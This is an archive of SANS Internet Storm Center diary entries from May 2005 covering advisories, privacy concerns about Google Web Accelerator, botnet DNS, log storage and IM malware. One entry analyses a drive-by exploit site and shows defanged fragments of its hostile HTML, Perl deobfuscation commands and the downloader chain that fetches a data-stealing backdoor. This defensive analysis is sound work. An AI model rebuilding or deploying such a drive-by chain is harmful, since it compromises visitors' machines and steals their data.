As for Google's cache: time will tell.

One thing is sure however: web developers and security folks will have to deal with this eventually. Expect clients to prefetch information, so don't assume the user did anything, it's all like a spider running over the pages.

phpBB 2.0.15 released

As we reported on phpBB issues, phpBB released today (yes, on a Saturday) a new release: 2.0.15 . Among the fixes are authentication fixes for the admin panel and one critical fix in the handling of bbcode.

Download from:


Update notification:


Considering the level of attention for phpBB, we highly recommend to upgrade or patch soon. Don't forget to update both the database and the individual files.

Backdoors more popular than Viruses?

A reader pointed out that "backdoor.hackdefender" was rather popular at . Looking at the top 10, it shows that most of the top 10 are backdoors.

Perhaps time to make a mental note that although backdoors typically don't have fast rates to spread they do seem to be widely available in the wild.

Add to that that cleaning up from a backdoor is tricky business: what else was installed/changed/... while the backdoor was installed ? Typical viruses are much more predictable and therefore easier to clean up.

As such it might be a good moment to check the risk levels of backdoors in your organization and perhaps take some more measures.

Let us know what you think about it. If you do have extra measures in addition to the typical anti-virus measures to counter the threat of backdoors, let us know which.

Anti-Spyware poll results

Reviewing the anti-spyware poll results is like reading your logs. From our community of security minded readers it's easy to see the trend towards people aware of the problem and aware of the Windows/Internet Explorer combination being targeted by spyware.
As such the results are a bit predictable but if you answered that you don't use anti-spyware and are using that combination or if you are using anti-spyware that proofs not to be working properly, try some of the suggestions the other readers left:

- HijackThis! (for advanced users)
- IEspyad
- Lavasoft Ad-Aware
- Microsoft antispyware (beta)
- Spybot S&D

This is not an endorsement, nor do we claim it's a complete overview.
Take care with HijackThis, it can destroy a windows machine if used
without the proper knowledge.

Keep in mind that if/when other browsers or OSes become popular and/or vulnerable enough, the attention of the spyware folks might shift suddenly.

A solution that works for larger organizations would be a good selling argument for the vendors.

Exploit against Firefox 1.0.3

Speaking of other browsers and being vulnerable, FrSIRT (aka K-OTik) published a 0-day exploit against FireFox 1.0.3 .

Impact: remote code execution without user interaction

Patch: none available

Workaround: disable javascript

Google.com DNS glitch

We're getting a lot of reports regarding a glitch in google's DNS information. On first looks it seems not to be hostile.

$ dig news.google.com
; <<>> DiG 9.2.3 <<>> news.google.com
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61748
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0
;news.google.com. IN A
news.google.com. 900 IN CNAME news.l.google.com.
l.google.com. 900 IN SOA ns1.google.com.l.google.com.
dns-admin.google.com. 1115309515 900 900 1800 900
;; Query time: 37 msec
;; WHEN: Sun May 8 01:14:28 2005
;; MSG SIZE rcvd: 115

It seems the problems have been resolved in the mean time.

There was one report of a redirect during the downtime to a "sogo" search page, if you have captures of what DNS contained at those times, we'll be happy to receive them.

Microsoft SQL server 2000 SP4

Gilles from FrSIRT reported to us that Microsoft released yesterday (not the beta release).


Swa Frantzen
Published: 2005-05-06

Google Web Accelerator; Snort with ClamAV; RSA SecurID WebAgent Overflow

Google Web Accelerator -- Much ado about caching

Google's new Web Accelerator beta is raising a surprising number of
concerns in, and around, the security community. For example, reader
Matthew S. writes in with the following reccomendation that he has made
to his boss regarding this new tool:

"I think the security and privacy concerns with this software are
huge, and our users should not install it.

"It caches your cookies with Google servers. People using the
Accelerator are reporting that when they access a user-specific web site
they sometimes appear logged in as another user, in other words, Google is
accessing the site with someone else's cookie. Anything you access over http
(not https) is fair game to be cached either in your browser or Google's

"The pre-fetching is indiscriminate - a link on the page you're
visiting that says "delete", for example, is fair game. This can cause
havoc with poorly-written web apps (most web apps, in other words),
because it's not an anonymous spider clicking links, it's a session
with an authorized cookie.

"Use of this browser plug-in in its current state could increase
the risk of information disclosure through our public web apps. It's not
clear at this time if the tool will also share pre-fetched information
from internal web sites with Google, but that is a possibility."

Some of the concerns being raised are, in my opinion, premature. Certainly,
the ability to access the session of another user is troubling, but it is
also nothing new. These problems have plauged sites with proxy-caches for
years, but the affected community was much smaller. These are simple bugs
in caching systems, and will undoubtably be fixed by Google like those
before them.

Link prefetching causing destructive behavior on "poorly-written web apps"
is likely to be a much harder nut to crack for Google, but I don't expect
that this will be a wide-spread disaster either; there are many hidden
cues within most html documents that suggest links that are part of a
menuing system.

However, I am personally concerned about the longer term effects of
Google having access to every users' entire browsing session, as well as
the effects it will have on site administrators in terms of access control
and statistics gathering, and discussions have already been started on
how to combat this global proxy, mostly by blocking IP ranges.


IP blocking is a rather crude answer to this issue, and I'd be very
interested to see if there were a more elegant solution based upon
identifying characteristics in the proxied requests, as one cannot
expect the IP ranges to stay constant if this becomes a popular service.

Furthermore, there are a number of potentially troublesome issues
involved in having a giant global proxy-cache service available.
In the short term, GWA is likely to be useful in breaking through
restrictive corporate filtering proxies, which I expect to see
solved quickly. However, if GWA happens to become a popular
service, we can expect to see it used as a "poor-man's Akamai",
which has a number of worrying implications for phishing scams
and malware distribution being even more decoupled from the
end node; resulting in a very busy abuse desk at Google.

From a users perspective, some folks have gone as far as classifying
GWA as spyware, which has a very slight, if highly sarcastic, ring of truth
to it. While GWA is not sneakily installed on your system without your
knowledge, it does have the potential for collecting a vast array of
information that end users may not wish to allow Google to have, regardless
of their motives.

Users will have to ask themselves what they're trading in exchange for a
global web caching solution, and decide if it is worth it or not.
Of course, users have already had to make similar privacy vs. functionality
decisions with gmail and the google toolbar.

For more coverage of this topic:


ClamAV integration with Snort

William Metcalf and Victor Julien have written a preprocessor for Snort
that integrates the ClamAV antivirus package with existing IDS or IPS
functionality in Snort. This could become a very happy marriage of
software, and definately worth checking out!


RSA SecurID WebAgent Heap Overflow

SEC-1 Ltd., has released a notification of a heap overflow in the RSA SecurID
WebAgent version 5.0 through 5.3. A proof-of-concept tool is not currently
available, but the published details are sufficient to indicate where to
begin searching for the bug. This flaw results in an unauthenticated
attacker being able to execute code within the LocalSystem context.
Patches have been made available to anyone with a current RSA maintenance
login at https://knowledge.rsasecurity.com


Published: 2005-05-05

Catch of the Day; Scripted mass hack; Not-so-black Tuesday ahead

Viva el 5 de mayo!

Los amigos Mexicanos celebran hoy el 5 de mayo, una fiesta en conmemoracion de la derrota de Maximiliano en 1867. Porque hablo mejor PERL que Espanol, dejo de escribir el diario de hoy en ese idioma, pero os deseo una fiesta estupenda! Es la unica del siglo con la fecha 5-5-5 :-).

Catch of the day: smelly malware

With the suspicious nature common to malware survivors, ISC reader Phil "got a bit worried" when he noticed that a web site was opening a zero-width frame that seemed to hide something. After digging around some, he found his hunches confirmed, and also two files that none of the AV vendors on <A HREF="http://www.virustotal.com">virustotal.com</A> seemed to recognize as hostile. Here's a write-up of what we found, to sharpen your malware survivor senses. Some of the original HTML off the hostile site had to be heavily modified for this write-up, mainly by cutting out sections or converting characters to "X". We woudln't want a SANS ISC diary to trigger your workstation or perimeter antivirus...
The base exploit page


Exploit #1 - Java Classloader Vulnerability
The first exploit, hidden behind the "e1" frame, is a Java based privilege escalation, a variant of the Java Bytever/Classloader family of exploits. The corresponding vulnerability is pretty old (MS03-011), making "success" of this exploit highly doubtful.

APXLET ARCHIVE="/e1/java.jar" CODE="NudeBoxx.class"

In addition to the actual exploit code, the JAR archive also contains a ZIP file. But things are not always what they seem...

$ file javautil.zip
javautil.zip: DOS executable (EXE)

The ZIP turns out to be an EXE obfuscated with the FSG packer, and when run downloads and executes a file called "update.exe" from the attacker's site. More on update.exe in a minute.
Exploit #2 - IE Vulnerabilities
The second exploit, hidden behind the /e2/ frame, is nastier. It starts with checking the browser version of the user, and then supplies the correct exploit to match. For older versions of Windows, the following encoded script is returned (heavily modified - Antivirus tools seem to love this exploit):

... etc going on for 2 pages of numbers

XOR encoding is frequently used in JavaScript exploits as an attempt to avoid detection by IDS sensors and Antivirus software. A little PERL magic can be used to rapidly unwrap the above XOR obfuscation without having to actually run the code:

$ perl -pe '$x=24; s/(\d*);/chr($1^$x++)/ge' index2old.html

But, alas, the resulting mess is STILL encoded:

... etc going on for one page of %u00xx numbers ...

Some more PERL magic later

$ perl -pe 's/\%u00(..)/chr(hex($1))/ge' index2old.out

we finally reveal the exploit hidden under this double layer of encoding.

hxxp://malwaresite.url//index.cXm :: /index.html

Yes - it's the oldie but goldie Microsoft Compiled Helpfile (CHM) exploit, MS02-055. Unlikely to work on a current OS. Which is why the /e2/ exploit started with a browser detection routine - for users surfing to the hostile page with XP SP2, the attacker doesn't even try the CHM vulnerability, but right away launches an exploit known as "HijackClick3", a variant of the infamous "Drag and Drop" vulnerability in Internet Explorer (MS04-38 / <A HREF="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0841">CAN-2004-0841</A>). This exploit is too complicated and too impossible to render harmless to include it here in the diary.

Exploit #3 - More Internet Explorer Vulnerabilities
Lurking behind the /e3/ frame is an exploit for a pretty recent vulnerability, MS05-001. The exploit, similar to the one documented by <A HREF="http://www.frsirt.com/exploits/20041228.CMDExe.php">FRSIRT</A>, downloads a file called "cmdexe.txt", which in turn fetches and starts a file "cmdexe.exe", all without requiring user interaction of course. cmdexe.exe is the same downloader trojan that we have already encountered earlier in the disguise of "javautil.zip", and it also fetches "update.exe" from the malware site.

The payload
At the time of writing, update.exe is not yet recognized by any of the Antivirus softwares we could test it with. The file is packed with FSG, and after unpacking almost 400kB of size. Lots of nasty things can be done in 400k of code... What we know so far from analyzing the binary, it contains a component used to gather information on the system and to submit this bounty via HTTP POST to a webserver in Europe. It also installs a multifunctional proxy (HTTP/Socks/POP3/etc). What else it does we dont know yet. Update 2015UTC:McAfee/NAI have dubbed this file "Backdoor-CRR".
Thanks to a hosting provider who very quickly and competently responded to our report of the malicious site, the site hosting this flurry of exploits is no more. But the web servers in Europe to which update.exe is reporting information on infected hosts are still up.

One more scripted mass hack

It seems as if several web sites were modified in yet another mass hack yesterday, similar to the one we've reported <A HREF="http://isc.sans.org/diary.php?date=2005-03-13">two months ago</A>. Most likely, a script was used to amend all web sites hosted on one or more shared servers with a hostile IFRAME, redirecting visitors to hxxp://www.tgp.la/or.html. Don't go there - it's an Adware site, redirecting to places where you maybe should not tread, including a page on realizeit.biz that tries the CHM exploit to drop a present. Checking with a search engine, it looks as if more than 1500 pages have been thus modified. Thanks to ISC reader Roger for letting us know.

Next Tuesday is Patch Tuesday...

...and it seems as if it's going to be a quiet one, for a change. According to Microsoft's <A HREF="http://www.microsoft.com/technet/security/bulletin/advance.mspx">advance announcement</A>, we can expect one single bulletin on May 10, rated "Important"

Daniel Wesemann

EMail: echo "ebojfm/jtdAhnbjm/dpn" | perl -pe 's/(.)/chr(ord($1)-1)/ge'


Published: 2005-05-04

OS X VPN vuln; XSS from unexpected places; some ramblings on storage

MacOS X vpnd vulnerability disclosed

A local buffer overflow vulnerability in Apple MacOS X was disclosed on he vulnwatch mailing list today. The vpn demon, suid by default, can reportedly be exploited to execute arbitrary code by a local nonprivileged user.
CVE ID CAN-2005-1343 has been assigned to this. Apple Security Update 2005-005 fixes this and other issues. http://docs.info.apple.com/article.html?artnum=301528

XSS from unexpected places

A friend of the ISC passed along an email discussing code insertion showing up in whois records. Whois servers maintain contact information for registered domains and ip address allocations. Through the use of '<script>' tags, code can be executed by browsers when viewing those records.

Similar unexpected sources of code may include network traces, system logs, anything that can contain text from potentially untrusted origins. If you're using Mozilla Firefox as a browser you can use the "prefbar" extension to quickly turn on and off java/javascript/flash without navigating menus. Makes applying POLP a lot more convenient. Principle of Least Privilege.

Some ramblings on storage

Someone emailed asking for recommendations on storage of security logs data and I though this might be useful for others facing similar planning challenges -

We keep data around for three reasons: Someone important says we need
to, we are going to use the data later, or we just like having it or
are too lazy to clean it out. A major goal in any storage project
should be to get that down to the first two. Although I haven't
gathered empirical evidence to support this, I'll venture that a
large percentage of our storage challenges are the result of number
three. That can most readily be dealt with through self discipline
and/or draconian quotas. Let's examine the first two a little more.

First, we need to contend with regulatory obligations. In the case of
SOX or HIPAA, there are plenty of folks making money by helping
companies out with compliance, since there are fairly healthy data
retention and security requirements with both. For my research, I am
required by the funders to keep all raw data on hand for at least
three years - we are building yet another data library at this time.
You may have other requirements - speak with your compliance officer
so you can be sure to place the blam^H^H^H^H^H^H^H^H^H^H^H^H^Hcover
all the bases.

The secondary concern is usefulness. The usefulness of a record
depreciates with time, as its contextual relevance decays. In other
words, as a piece of data becomes less likely to be correlated with
new events, its (other than compliance) value shrinks. If you are
doing no analysis at all, then the usefulness of any logs is nil.

If you see something in your firewall logs and wish to correlate with
the past month's worth of logs, they had better be available. Without
anyone doing such analysis, the month of logs really isn't all that
useful. A grocery store owner probably doesn't need to keep those
firewall logs very long, same goes for her video surveillance tapes
(she'll know prety quickly whether or not those need reviewing!) Her
stock ledgers and employee records are likely to be held onto for
years, as there may be government bodies who say so, or she
recognizes the efficiency gains that she can reap by correlating
data and trending "shrinkage".

Aggregate analysis of data (bandwidth percentiles, IDS alert class
frequency, storage utilization, etc.) requires raw metrics be retained
until that aggregation takes place. After that, the raw data can be
discarded if you will not be doing anything further with it. Any
meta-analysis using the monthly aggregates will neccesitate storage &
retrieval of those aggregates, until *they* are no longer needeed. And
so on, and so on. Essentially, it is a distilling process, where you
boil off what isn't needed any longer, while the essence of it remains
available for consumption or later cooking.

With network traffic, this distillation process often starts at the
router, returning netflows rather than raw packet data. In the case of
IDS, often raw packet captures are fed through some rule-based engine
and its findings are reported, sometimes including the specific
libpcap records that are related to an alert event. Once you have this
data you then draw pretty graphs, give your monthly briefing, and earn
a nice bonus. Then you can discard the raw data, keeping the graphs
for the quarterly summary. However, if Kirby from accounting is
colorblind and you are likely to be asked to recreate them as bar
graphs instead of pie charts, you may want to hang onto the raw data a
little longer, at least until after the quarterly.

I personally am a packet geek. I love to roll around in them and get
dirty as much as possible, but I recognize their value diminishes
pretty rapidly, so I generally go with full packets at first, then
reduce them with editcap to 128 bytes after 48 hours, then to 48 bytes
after a month. The statistics pulled from them I keep around for a
year, then they are overwritten.

Back to your question, "any pointers?". I advise a strategy along
these lines:

1. Identify any regulatory requirements
2. Examine current and anticipated analysis methods
3. Identify data required to support #2 and its retrieval frequency
4. Codify what you find in #2 into policy so folks (and you) don't go
hog wild
5. Factor in organizational growth, including system deployment,
bandwidth, etc.
6. Factor in privacy and security needs - crypto is good, but adds
7. Given the above, calculate online, nearline & offline storage
8. Double #7
9. Talk to competing storage vendors about meeting #7 AND demand
performance demos. They have been helping others meet sophisticated
needs for some time and probably can help sanity check your proposed
strategy, (maybe without paying them for the consulting!). Get
those demos, onsite if possible. Don't settle for white papers,
someone else's reviews, etc. If they want your $ they'll work for
10. Once the system(s) is in place, schedule regular emergency
procedure drills. Expect there to be fires, power failures, broken
water pipes, physical and online intrusions, etc. You may want to
consider this during the planning phases, as well.

A few general notes:

- Software compression may seem like a good idea, but in production
more aggressive algorithms kill your performance. Go for hardware
compression on your LTO drives for offline stuff.

- For large volumes of integrity-critical data, take a look at some of
the new CAS and hard-disk WORM technologies. Expensive, but worth it.
Oh, yeah - don't get too wrapped up in the MD5 vs. SHA1 arguments.
Some CAS vendors will claim to be "more secure" since they use SHA1.
Yes, there is an academic proof for MD5 collisions, but in reality
your data will be long-ago worthless by the time someone can exploit
that on a real storage system.

- End to end security is essential. Don't forget about offline and
offsite storage, including physical site and transportation. Don't let
a disgruntled minimum wage courier be the weakest link in your
organization's data confidentiality. I've seen it happen.




Published: 2005-05-03

Botnets Host DNS; 'leet Names and Security Tools

Botnets Used to Host DNS for Phishing

A recent post to the Dailydave mailing list, titled , described an incident similar to the report we received yesterday. The report outlined a large organization's battle against a botnet that implemented a phishing attack against the organization's customers. The trend to use bots for hosting phishing websites on compromised systems is not new, and was documented in the Register article titled . Using bots in this manner makes it difficult to shut down the malicious site, because the attacker can quickly modify the domain record to point to another compromised system. One way to defend against such attacks is to work with the company hosting the DNS server that resolves the malicious domain name to remove or modify the offending records.

Attacks that we're observing now are becoming more elaborate. In the most recent report, the attacker was using a botnet to host not only the malicious websites, but also the DNS servers that provided domain resolution services for the targeted domain name. This setup allowed the attacker to move to a new DNS server when one of the malicious servers got shut down. An organization battling this threat typically has to deal with the registrar of the malicious domain, instead of attempting to shut down the individual DNS server. Unfortunately, many domain registrars don't have formal procedures for dealing with such requests, which makes it difficult for organizations to defend against such attacks.

Some ISP can help their customers combat such attacks by implementing a type of domain hijacking, intercepting and redirecting malicious DNS traffic that traverses their network. While this approach does not entirely mitigate the issue, it does mitigate it within the ISP's network; it is particularly effective if implemented by a large ISP. Considering the limitations of this mechanism, having domain registrars develop processes for addressing this attack scenario would be very helpful.

'leet Names and the Distribution of Security Tools

The file name of Stinger, McAfee's stand-alone tool for detecting and removing popular malware specimens, has been changed from stinger.exe to ST1NGER.EXE; notice the use of number "1" instead of letter "i". (See "Update 1" below to learn how this has changed since this diary was originally published.) This is a response to the
self-defense tactic of looking for programs named stinger.exe. Using a name other than stinger.exe allows McAfee's tool to run on the infected system. This is briefly mentioned in the , and on the . One of our readers wrote to us, suspicious of the new file name. It didn't help that the screen shot on the Stinger's download page showed the original file name of stinger.exe.

The use of number "1" in the new name to replace letter "i" is a poor choice because of its resemblance to techniques attackers use to fool victims. Consider, for example, an attack that employs the domain name paypa1.com, using the number "1" (one) rather than the letter "l" (L), in a phishing scheme. Computer users are starting to pay attention to common letter replacements like this, and are learning to become suspicious of them. We should shy away from naming schemes that interfere with this learning process.

Perhaps a better tactic would be to automatically assign a random file name to a tool such as Stinger when the user downloads it. A similar approach
for naming anti-rootkit utilities such as Sysinternals and F-Secure to get around the tactic of rootkits modifying their behavior when scanned by known security tools.

Regardless of the file naming scheme, it would be very helpful to see MD5 hashes of the security tools we download, which the vendors could make available on websites other than those hosting the tools. Having a SHA-1 hash of the executable as well would be even nicer. Those worried about potential
and MD5 might argue for the use of another algorithm. Regardless of the algorithm, having a cryptographic hash or signature of the executable would help concerned users and administrators verify the integrity of the downloaded tool.

Update 1: McAfee notified us that they've now changed the file name of the Stinger tool from ST1NGER.EXE to s-t-i-n-g-e-r.exe. Thanks for addressing the immediate problem so quickly! McAfee is in the process of evaluating other methods of circumventing anti-Stinger tactics.

Update 2: I modified the diary to correct the fact that the Stinger description page actually includes a note about the change in the tool's name. This information was in the Update History section at the bottom of the page. I originally stated that this information was not included in the page at all. This information is also now included next to the download link on that page.

Lenny Zeltser

ISC Handler of the Day



Published: 2005-05-02

Top 20 update; IM malware and IRC bots are the flavor of the day; Sober variant

SANS Top 20 Quarterly update


On May 2, 2005, the sponsors of the Top20 project released the first installment in a new program of quarterly updates to the Top20. It updates the annual Top20 and provides an additional roadmap to the new vulnerabilities that must be eliminated in any Internet-connected organization.

IM malware and IRC bots are the flavor of the day

There were multiple reports this weekend of malware spreading via
AIM and other instant messaging, which then logged the compromised
systems into an IRC channel to be fed instructions on where to download
more nasties.

One organization noticed a heavy increase in arp and TCP port 445 traffic,
the infected systems were scanning locally, and then the outbound IRC traffic
was noticed.

1- Hey check this out
2- Click on link
3- Download and run goodies
4- Your computer isn't really answering to you anymore
5- Your computer logs into IRC all by itself
6- The new master tells your computer to download more goodies
7- More malware is downloaded and installed
8- Your computer is now sending 'hey check this out' to all your buddies on IM
9- Your computer is now infecting other computers by scanning them
10- Your computer is now sending our spam, viruses, and attacking others and
generally not doing anything useful that you would like it to do, it's too busy.

Aren't you glad you checked it out?

New Sober Variant

A new sober variant is making the rounds, spreading surprisingly quickly.
We have received multiple reports, the file name we have seen is our_secret.zip.
Your anti-virus vendor of choice will have named it something interesting,
with 'sober' somewhere in there.




Adrien de Beaupré

Handler of the day



Published: 2005-05-01

IM and Malware

IM and Malware

There are alot of great uses for IM and folks love to use it. But care needs to be taken when clicking on links. We have received several reports of suspicious links being received which upon further analysis are really links to malware. Make sure you know what your clicking on, even if the link comes from someone that you know. Malware can send out links to itself to everyone in the person's buddy list. Take care when you feel the need to click....you might get more than you bargained for.

All has been very quiet so far for this shift, but stay tuned for further updates.

Lorna Hutcheson

Handler on Duty